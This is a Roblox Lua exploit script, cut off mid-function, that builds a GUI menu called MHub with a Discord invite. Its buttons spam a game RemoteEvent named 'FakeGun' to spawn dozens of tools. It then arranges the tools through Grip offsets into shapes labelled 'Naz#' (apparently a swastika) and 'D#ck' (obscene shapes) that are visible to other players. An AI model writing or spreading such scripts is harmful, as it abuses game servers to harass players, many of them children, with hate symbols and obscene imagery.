-- Gui to Lua
-- Version: 3.2

-- Instances:

local MHub = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local TextButton = Instance.new("TextButton")
local Minimize = Instance.new("TextButton")
local TextLabel = Instance.new("TextLabel")
local Frame_2 = Instance.new("Frame")
local UICorner_2 = Instance.new("UICorner")
local GunMaker = Instance.new("TextButton")
local UICorner_3 = Instance.new("UICorner")
local ScrollingFrame = Instance.new("ScrollingFrame")
local TextButton_2 = Instance.new("TextButton")
local UICorner_4 = Instance.new("UICorner")
local UIListLayout = Instance.new("UIListLayout")
local TextButton_3 = Instance.new("TextButton")
local UICorner_5 = Instance.new("UICorner")
local TextButton_4 = Instance.new("TextButton")
local UICorner_6 = Instance.new("UICorner")
local TextButton_5 = Instance.new("TextButton")
local UICorner_7 = Instance.new("UICorner")
local TextBox = Instance.new("TextBox")
local UICorner_8 = Instance.new("UICorner")
local TextButton_6 = Instance.new("TextButton")
local UICorner_9 = Instance.new("UICorner")
local Home = Instance.new("TextButton")
local UICorner_10 = Instance.new("UICorner")
local ScrollingFrame_2 = Instance.new("ScrollingFrame")
local TextLabel_3 = Instance.new("TextLabel")
local Visiblee = Instance.new("TextButton")

--Properties:

MHub.Name = "MHub"
MHub.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
MHub.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
MHub.ResetOnSpawn = false

Frame.Parent = MHub
Frame.BackgroundColor3 = Color3.fromRGB(21, 21, 21)
Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.218404904, 0, 0.248987854, 0)
Frame.Size = UDim2.new(0, 458, 0, 21)
Frame.SizeConstraint = Enum.SizeConstraint.RelativeXX
Frame.Active = true
Frame.Draggable = true

UICorner.Parent = Frame

TextButton.Parent = Frame
TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton.BackgroundTransparency = 1.000
TextButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton.BorderSizePixel = 0
TextButton.Position = UDim2.new(0.882096052, 0, 0.142857149, 0)
TextButton.Size = UDim2.new(0, 54, 0, 14)
TextButton.Font = Enum.Font.SourceSansBold
TextButton.Text = "X"
TextButton.TextColor3 = Color3.fromRGB(255, 0, 4)
TextButton.TextSize = 22.000
TextButton.TextWrapped = true

Minimize.Name = "Minimize"
Minimize.Parent = Frame
Minimize.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Minimize.BackgroundTransparency = 1.000
Minimize.BorderColor3 = Color3.fromRGB(0, 0, 0)
Minimize.BorderSizePixel = 0
Minimize.Position = UDim2.new(0.799100518, 0, -0.0095236646, 0)
Minimize.Size = UDim2.new(0, 54, 0, 14)
Minimize.Font = Enum.Font.SourceSans
Minimize.Text = "-"
Minimize.TextColor3 = Color3.fromRGB(255, 255, 255)
Minimize.TextSize = 50.000
Minimize.TextWrapped = true

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.11135371, 0, 0.190476194, 0)
TextLabel.Size = UDim2.new(0, 298, 0, 17)
TextLabel.Font = Enum.Font.SourceSansBold
TextLabel.Text = "discord.gg/gqXhkcfwJH"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 20.000
TextLabel.TextWrapped = true

Frame_2.Parent = Frame
Frame_2.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
Frame_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame_2.BorderSizePixel = 0
Frame_2.Position = UDim2.new(6.43001404e-05, 0, -0.0155203687, 0)
Frame_2.Size = UDim2.new(0, 458, 0, 273)
Frame_2.ZIndex = 0

UICorner_2.Parent = Frame_2

GunMaker.Name = "GunMaker"
GunMaker.Parent = Frame_2
GunMaker.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
GunMaker.BorderColor3 = Color3.fromRGB(0, 0, 0)
GunMaker.BorderSizePixel = 0
GunMaker.Position = UDim2.new(0, 0, 0.234432235, 0)
GunMaker.Size = UDim2.new(0, 96, 0, 23)
GunMaker.Font = Enum.Font.Creepster
GunMaker.Text = "Gun Maker"
GunMaker.TextColor3 = Color3.fromRGB(0, 0, 0)
GunMaker.TextScaled = true
GunMaker.TextSize = 14.000
GunMaker.TextWrapped = true

UICorner_3.CornerRadius = UDim.new(0, 3)
UICorner_3.Parent = GunMaker

ScrollingFrame.Parent = GunMaker
ScrollingFrame.Active = true
ScrollingFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ScrollingFrame.BackgroundTransparency = 1.000
ScrollingFrame.BorderColor3 = Color3.fromRGB(0, 0, 0)
ScrollingFrame.BorderSizePixel = 0
ScrollingFrame.Position = UDim2.new(1, 0, -1.60869563, 0)
ScrollingFrame.Size = UDim2.new(0, 355, 0, 240)
ScrollingFrame.Visible = false

TextButton_2.Parent = ScrollingFrame
TextButton_2.BackgroundColor3 = Color3.fromRGB(49, 49, 49)
TextButton_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_2.BorderSizePixel = 0
TextButton_2.Position = UDim2.new(0.0197183099, 0, 0, 0)
TextButton_2.Size = UDim2.new(0, 310, 0, 29)
TextButton_2.Font = Enum.Font.Creepster
TextButton_2.Text = "Clear Guns"
TextButton_2.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_2.TextSize = 30.000
TextButton_2.TextWrapped = true

UICorner_4.Parent = TextButton_2

UIListLayout.Parent = ScrollingFrame
UIListLayout.HorizontalAlignment = Enum.HorizontalAlignment.Center
UIListLayout.SortOrder = Enum.SortOrder.LayoutOrder
UIListLayout.Padding = UDim.new(0, 10)

TextButton_3.Parent = ScrollingFrame
TextButton_3.BackgroundColor3 = Color3.fromRGB(49, 49, 49)
TextButton_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_3.BorderSizePixel = 0
TextButton_3.Position = UDim2.new(0.0197183099, 0, 0, 0)
TextButton_3.Size = UDim2.new(0, 310, 0, 29)
TextButton_3.Font = Enum.Font.Creepster
TextButton_3.Text = "Naz#"
TextButton_3.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_3.TextSize = 30.000
TextButton_3.TextWrapped = true

UICorner_5.Parent = TextButton_3

TextButton_4.Parent = ScrollingFrame
TextButton_4.BackgroundColor3 = Color3.fromRGB(49, 49, 49)
TextButton_4.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_4.BorderSizePixel = 0
TextButton_4.Position = UDim2.new(0.0197183099, 0, 0, 0)
TextButton_4.Size = UDim2.new(0, 310, 0, 29)
TextButton_4.Font = Enum.Font.Creepster
TextButton_4.Text = "D#ck"
TextButton_4.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_4.TextSize = 30.000
TextButton_4.TextWrapped = true

UICorner_6.Parent = TextButton_4

TextButton_5.Parent = ScrollingFrame
TextButton_5.BackgroundColor3 = Color3.fromRGB(49, 49, 49)
TextButton_5.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_5.BorderSizePixel = 0
TextButton_5.Position = UDim2.new(0.0197183099, 0, 0, 0)
TextButton_5.Size = UDim2.new(0, 310, 0, 29)
TextButton_5.Font = Enum.Font.Creepster
TextButton_5.Text = "D#ck Text"
TextButton_5.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_5.TextSize = 30.000
TextButton_5.TextWrapped = true

UICorner_7.Parent = TextButton_5

TextBox.Parent = ScrollingFrame
TextBox.BackgroundColor3 = Color3.fromRGB(49, 49, 49)
TextBox.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextBox.BorderSizePixel = 0
TextBox.Size = UDim2.new(0, 310, 0, 29)
TextBox.ClearTextOnFocus = false
TextBox.Font = Enum.Font.Creepster
TextBox.PlaceholderColor3 = Color3.fromRGB(130, 130, 130)
TextBox.PlaceholderText = "Enter Size 1-10"
TextBox.Text = ""
TextBox.TextColor3 = Color3.fromRGB(0, 0, 0)
TextBox.TextScaled = true
TextBox.TextSize = 14.000
TextBox.TextStrokeTransparency = 1.010
TextBox.TextWrapped = true

UICorner_8.Parent = TextBox

TextButton_6.Parent = ScrollingFrame
TextButton_6.BackgroundColor3 = Color3.fromRGB(49, 49, 49)
TextButton_6.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_6.BorderSizePixel = 0
TextButton_6.Position = UDim2.new(0.0197183099, 0, 0, 0)
TextButton_6.Size = UDim2.new(0, 310, 0, 29)
TextButton_6.Font = Enum.Font.Creepster
TextButton_6.Text = "D#ck"
TextButton_6.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_6.TextSize = 30.000
TextButton_6.TextWrapped = true

UICorner_9.Parent = TextButton_6

Home.Name = "Home"
Home.Parent = Frame_2
Home.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Home.BorderColor3 = Color3.fromRGB(0, 0, 0)
Home.BorderSizePixel = 0
Home.Position = UDim2.new(0, 0, 0.0989011005, 0)
Home.Size = UDim2.new(0, 96, 0, 23)
Home.Font = Enum.Font.Creepster
Home.Text = "Home"
Home.TextColor3 = Color3.fromRGB(0, 0, 0)
Home.TextScaled = true
Home.TextSize = 14.000
Home.TextWrapped = true

UICorner_10.CornerRadius = UDim.new(0, 3)
UICorner_10.Parent = Home

ScrollingFrame_2.Parent = Home
ScrollingFrame_2.Active = true
ScrollingFrame_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ScrollingFrame_2.BackgroundTransparency = 1.000
ScrollingFrame_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
ScrollingFrame_2.BorderSizePixel = 0
ScrollingFrame_2.Position = UDim2.new(1.22916663, 0, 0, 0)
ScrollingFrame_2.Size = UDim2.new(0, 325, 0, 235)
ScrollingFrame_2.Visible = true

TextLabel_3.Parent = ScrollingFrame_2
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_3.BorderSizePixel = 0
TextLabel_3.Position = UDim2.new(-2.81700721e-07, 0, 0.261702132, 0)
TextLabel_3.Size = UDim2.new(0, 301, 0, 83)
TextLabel_3.Font = Enum.Font.Creepster
TextLabel_3.Text = "Script by Myulee"
TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.TextScaled = true
TextLabel_3.TextSize = 14.000
TextLabel_3.TextWrapped = true

Visiblee.Name = "Visiblee"
Visiblee.Parent = Frame
Visiblee.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Visiblee.BackgroundTransparency = 1.000
Visiblee.BorderColor3 = Color3.fromRGB(0, 0, 0)
Visiblee.BorderSizePixel = 0
Visiblee.Position = UDim2.new(0.799100518, 0, -0.0095236646, 0)
Visiblee.Size = UDim2.new(0, 54, 0, 14)
Visiblee.Visible = false
Visiblee.Font = Enum.Font.SourceSans
Visiblee.Text = "-"
Visiblee.TextColor3 = Color3.fromRGB(255, 255, 255)
Visiblee.TextSize = 50.000
Visiblee.TextWrapped = true

-- Scripts:

local function OKJMCEZ_fake_script() -- TextButton_2.LocalScript 
	local script = Instance.new('LocalScript', TextButton_2)

	script.Parent.MouseButton1Click:Connect(function()
		game.Players.LocalPlayer.Character.Humanoid:UnequipTools()
		script.Parent.MouseButton1Click:Connect(function()
			for _, i in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
				if i ~= game.Players.LocalPlayer.Backpack.Emotes then
					if i:IsA("Tool") then
						i:Destroy()
					end
				end
			end
		end)
	end)
end
coroutine.wrap(OKJMCEZ_fake_script)()
local function SFAEI_fake_script() -- TextButton_3.LocalScript 
	local script = Instance.new('LocalScript', TextButton_3)

	script.Parent.MouseButton1Click:Connect(function()
		for i = 1,35 do
			local args = {
				[1] = true
			}

			game:GetService("ReplicatedStorage"):WaitForChild("Remotes"):WaitForChild("Gameplay"):WaitForChild("FakeGun"):FireServer(unpack(args))
		end    
		wait(1)

		game.Players.LocalPlayer.Character.Humanoid:UnequipTools()

		wait(1)
		local pl = game.Players.LocalPlayer
		local s = pl.Backpack:GetChildren()
		local 	s0 = {}
		for _, x in s do if x:IsA("Folder") then wait() else table.insert(s0, x) end end
		-----------
		s0[3].Grip = CFrame.new(1.5, 0.300000012, -4.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[3].Parent = pl.Character
		s0[4].Grip = CFrame.new(0.5, 0.300000012, -4.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[4].Parent = pl.Character
		s0[5].Grip = CFrame.new(-0.5, 0.300000012, -4.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[5].Parent = pl.Character
		s0[6].Grip = CFrame.new(-1.5, 0.300000012, -4.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[6].Parent = pl.Character
		s0[7].Grip = CFrame.new(-2.5, 0.300000012, -4.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[7].Parent = pl.Character


		s0[8].Grip = CFrame.new(1.5, 0.300000012, -5.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[8].Parent = pl.Character
		s0[9].Grip = CFrame.new(1.5, 0.300000012, -6.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[9].Parent = pl.Character
		s0[10].Grip = CFrame.new(1.5, 0.300000012, -7.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[10].Parent = pl.Character
		s0[11].Grip = CFrame.new(1.5, 0.300000012, -8.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[11].Parent = pl.Character
		s0[15].Grip = CFrame.new(1.5, 0.300000012, -9.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[15].Parent = pl.Character
		s0[30].Grip = CFrame.new(1.5, 0.300000012, -10.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[30].Parent = pl.Character




		s0[12].Grip = CFrame.new(-2.5, 0.300000012, -7.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[12].Parent = pl.Character
		s0[13].Grip = CFrame.new(-2.5, 0.300000012, -8.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[13].Parent = pl.Character
		s0[14].Grip = CFrame.new(-2.5, 0.300000012, -9.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[14].Parent = pl.Character
		s0[31].Grip = CFrame.new(-2.5, 0.300000012, -10.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[31].Parent = pl.Character



		s0[16].Grip = CFrame.new(-1.5, 0.300000012, -7.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[16].Parent = pl.Character
		s0[17].Grip = CFrame.new(-0.5, 0.300000012, -7.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[17].Parent = pl.Character
		s0[18].Grip = CFrame.new(0.5, 0.300000012, -7.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[18].Parent = pl.Character
		s0[19].Grip = CFrame.new(2.5, 0.300000012, -7.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[19].Parent = pl.Character
		s0[20].Grip = CFrame.new(3.5, 0.300000012, -7.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[20].Parent = pl.Character
		s0[21].Grip = CFrame.new(4.5, 0.300000012, -7.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[21].Parent = pl.Character
		s0[22].Grip = CFrame.new(5.5, 0.300000012, -7.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[22].Parent = pl.Character


		s0[23].Grip = CFrame.new(5.5, 0.300000012, -6.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[23].Parent = pl.Character
		s0[24].Grip = CFrame.new(5.5, 0.300000012, -5.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[24].Parent = pl.Character
		s0[25].Grip = CFrame.new(5.5, 0.300000012, -4.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[25].Parent = pl.Character


		s0[26].Grip = CFrame.new(2.5, 0.300000012, -10.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[26].Parent = pl.Character
		s0[27].Grip = CFrame.new(3.5, 0.300000012, -10.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[27].Parent = pl.Character
		s0[28].Grip = CFrame.new(4.5, 0.300000012, -10.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[28].Parent = pl.Character
		s0[29].Grip = CFrame.new(5.5, 0.300000012, -10.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[29].Parent = pl.Character
	end)
end
coroutine.wrap(SFAEI_fake_script)()
local function UMNYIN_fake_script() -- TextButton_4.LocalScript 
	local script = Instance.new('LocalScript', TextButton_4)

	script.Parent.MouseButton1Click:Connect(function()
		for i = 1,35 do
			local args = {
				[1] = true
			}

			game:GetService("ReplicatedStorage"):WaitForChild("Remotes"):WaitForChild("Gameplay"):WaitForChild("FakeGun"):FireServer(unpack(args))
		end    
		wait(1)

		game.Players.LocalPlayer.Character.Humanoid:UnequipTools()

		wait(1)
		local pl = game.Players.LocalPlayer
		local 	s = pl.Backpack:GetChildren()
		local s0 = {}
		for _, x in s do if x:IsA("Folder") then wait() else table.insert(s0, x) end end
		-----------
		s0[1].Grip = CFrame.new(0, 0, 0)
		s0[1].Parent = pl.Character
		s0[2].Grip = CFrame.new(1.5, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[2].Parent = pl.Character
		s0[3].Grip = CFrame.new(1.0, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[3].Parent = pl.Character
		s0[4].Grip = CFrame.new(2., 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[4].Parent = pl.Character
		s0[5].Grip = CFrame.new(1.5, -0.700000048, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[5].Parent = pl.Character
		s0[6].Grip = CFrame.new(1.5, -1.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[6].Parent = pl.Character
		s0[7].Grip = CFrame.new(1.5, -2.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[7].Parent = pl.Character
	end)
end
coroutine.wrap(UMNYIN_fake_script)()
local function ADRIYWD_fake_script() -- TextButton_5.LocalScript 
	local script = Instance.new('LocalScript', TextButton_5)

	script.Parent.MouseButton1Click:Connect(function()
		for i = 1,35 do
			local args = {
				[1] = true
			}

			game:GetService("ReplicatedStorage"):WaitForChild("Remotes"):WaitForChild("Gameplay"):WaitForChild("FakeGun"):FireServer(unpack(args))
		end    
		wait(1)

		game.Players.LocalPlayer.Character.Humanoid:UnequipTools()

		wait(1)
		local pl = game.Players.LocalPlayer
		local 	s = pl.Backpack:GetChildren()
		local	s0 = {}
		for _, x in s do if x:IsA("Folder") then wait() else table.insert(s0, x) end end
		-----------
		s0[1].Grip = CFrame.new(0, 0, 0)
		s0[1].Parent = pl.Character
		s0[2].Grip = CFrame.new(-2, 0.299999952, -3.29999995, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[2].Parent = pl.Character
		s0[3].Grip = CFrame.new(-2, 0.299999952, -4.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[3].Parent = pl.Character
		s0[4].Grip = CFrame.new(-2, 0.300000012, -5.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[4].Parent = pl.Character
		s0[5].Grip = CFrame.new(-2, 0.300000012, -6.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[5].Parent = pl.Character
		s0[6].Grip = CFrame.new(-1, 0.300000012, -6.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[6].Parent = pl.Character
		s0[7].Grip = CFrame.new(-1, 0.300000012, -3.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[7].Parent = pl.Character
		s0[8].Grip = CFrame.new(0, 0.300000012, -5.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[8].Parent = pl.Character
		s0[9].Grip = CFrame.new(0, 0.300000012, -4.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[9].Parent = pl.Character
		s0[10].Grip = CFrame.new(2, 0.300000012, -3.29999995, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[10].Parent = pl.Character
		s0[11].Grip = CFrame.new(2, 0.300000012, -4.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[11].Parent = pl.Character
		s0[12].Grip = CFrame.new(5, 0.300000012, -3.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[12].Parent = pl.Character
		s0[13].Grip = CFrame.new(2, 0.300000012, -6.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[13].Parent = pl.Character
		s0[14].Grip = CFrame.new(4, 0.300000012, -6.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[14].Parent = pl.Character
		s0[15].Grip = CFrame.new(4, 0.300000012, -5.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[15].Parent = pl.Character
		s0[16].Grip = CFrame.new(4, 0.300000012, -4.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[16].Parent = pl.Character
		s0[17].Grip = CFrame.new(4, 0.300000012, -3.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[17].Parent = pl.Character
		s0[18].Grip = CFrame.new(5, 0.300000012, -6.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[18].Parent = pl.Character
		s0[19].Grip = CFrame.new(6, 0.300000012, -6.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[19].Parent = pl.Character
		s0[20].Grip = CFrame.new(6, 0.300000012, -3.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[20].Parent = pl.Character
		s0[21].Grip = CFrame.new(8, 0.300000012, -4.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[21].Parent = pl.Character
		s0[22].Grip = CFrame.new(8, 0.299999952, -3.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[22].Parent = pl.Character
		s0[23].Grip = CFrame.new(8, 0.300000012, -5.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[23].Parent = pl.Character
		s0[24].Grip = CFrame.new(9, 0.300000012, -4.5, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[24].Parent = pl.Character
		s0[25].Grip = CFrame.new(9.5, 0.300000012, -5.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[25].Parent = pl.Character
		s0[26].Grip = CFrame.new(10, 0.300000012, -6.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[26].Parent = pl.Character
		s0[27].Grip = CFrame.new(9.5, 0.300000012, -4, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[27].Parent = pl.Character
		s0[28].Grip = CFrame.new(10, 0.300000012, -3.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[28].Parent = pl.Character
		s0[29].Grip = CFrame.new(8, 0.300000012, -6.30000019, 1, 0, 0, 0, 0, -1, 0, 1, 0)
		s0[29].Parent = pl.Character
	end)
end
coroutine.wrap(ADRIYWD_fake_script)()
local function XTBZ_fake_script() -- TextButton_6.LocalScript 
	local script = Instance.new('LocalScript', TextButton_6)

	script.Parent.MouseButton1Click:Connect(function()
		for i = 1,35 do
			local args = {
				[1] = true
			}

			game:GetService("ReplicatedStorage"):WaitForChild("Remotes"):WaitForChild("Gameplay"):WaitForChild("FakeGun"):FireServer(unpack(args))
		end    
		wait(1)

		game.Players.LocalPlayer.Character.Humanoid:UnequipTools()

		wait(1)
		if script.Parent.Parent.TextBox.Text == "1" then

			local pl = game.Players.LocalPlayer
			local 	s = pl.Backpack:GetChildren()
			local s0 = {}
			for _, x in s do if x:IsA("Folder") then wait() else table.insert(s0, x) end end
			-----------
			s0[1].Grip = CFrame.new(0, 0, 0)
			s0[1].Parent = pl.Character
			s0[2].Grip = CFrame.new(1.5, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[2].Parent = pl.Character
			s0[3].Grip = CFrame.new(1.0, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[3].Parent = pl.Character
			s0[4].Grip = CFrame.new(2., 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[4].Parent = pl.Character
			s0[5].Grip = CFrame.new(1.5, -0.700000048, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[5].Parent = pl.Character
		end
		if script.Parent.Parent.TextBox.Text == "2" then

			local pl = game.Players.LocalPlayer
			local 	s = pl.Backpack:GetChildren()
			local s0 = {}
			for _, x in s do if x:IsA("Folder") then wait() else table.insert(s0, x) end end
			-----------
			s0[1].Grip = CFrame.new(0, 0, 0)
			s0[1].Parent = pl.Character
			s0[2].Grip = CFrame.new(1.5, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[2].Parent = pl.Character
			s0[3].Grip = CFrame.new(1.0, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[3].Parent = pl.Character
			s0[4].Grip = CFrame.new(2., 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[4].Parent = pl.Character
			s0[5].Grip = CFrame.new(1.5, -0.700000048, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[5].Parent = pl.Character
			s0[6].Grip = CFrame.new(1.5, -1.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[6].Parent = pl.Character
		end
		if script.Parent.Parent.TextBox.Text == "3" then


			local pl = game.Players.LocalPlayer
			local 	s = pl.Backpack:GetChildren()
			local s0 = {}
			for _, x in s do if x:IsA("Folder") then wait() else table.insert(s0, x) end end
			-----------
			s0[1].Grip = CFrame.new(0, 0, 0)
			s0[1].Parent = pl.Character
			s0[2].Grip = CFrame.new(1.5, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[2].Parent = pl.Character
			s0[3].Grip = CFrame.new(1.0, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[3].Parent = pl.Character
			s0[4].Grip = CFrame.new(2., 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[4].Parent = pl.Character
			s0[5].Grip = CFrame.new(1.5, -0.700000048, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[5].Parent = pl.Character
			s0[6].Grip = CFrame.new(1.5, -1.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[6].Parent = pl.Character
			s0[7].Grip = CFrame.new(1.5, -2.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[7].Parent = pl.Character
		end
		if script.Parent.Parent.TextBox.Text == "4" then
			local pl = game.Players.LocalPlayer
			local 	s = pl.Backpack:GetChildren()
			local s0 = {}
			for _, x in s do if x:IsA("Folder") then wait() else table.insert(s0, x) end end
			-----------
			s0[1].Grip = CFrame.new(0, 0, 0)
			s0[1].Parent = pl.Character
			s0[2].Grip = CFrame.new(1.5, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[2].Parent = pl.Character
			s0[3].Grip = CFrame.new(1.0, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[3].Parent = pl.Character
			s0[4].Grip = CFrame.new(2., 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[4].Parent = pl.Character
			s0[5].Grip = CFrame.new(1.5, -0.700000048, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[5].Parent = pl.Character
			s0[6].Grip = CFrame.new(1.5, -1.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[6].Parent = pl.Character
			s0[7].Grip = CFrame.new(1.5, -2.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[7].Parent = pl.Character
			s0[8].Grip = CFrame.new(1.5, -3.70000005, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[8].Parent = pl.Character
		end
		if script.Parent.Parent.TextBox.Text == "5" then
			local pl = game.Players.LocalPlayer
			local 	s = pl.Backpack:GetChildren()
			local s0 = {}
			for _, x in s do if x:IsA("Folder") then wait() else table.insert(s0, x) end end
			-----------
			s0[1].Grip = CFrame.new(0, 0, 0)
			s0[1].Parent = pl.Character
			s0[2].Grip = CFrame.new(1.5, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[2].Parent = pl.Character
			s0[3].Grip = CFrame.new(1.0, 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
			s0[3].Parent = pl.Character
			s0[4].Grip = CFrame.new(2., 0.300000012, 1.70000005, 1, 0, 0, 0, 0, -1, 0, 1, 0)
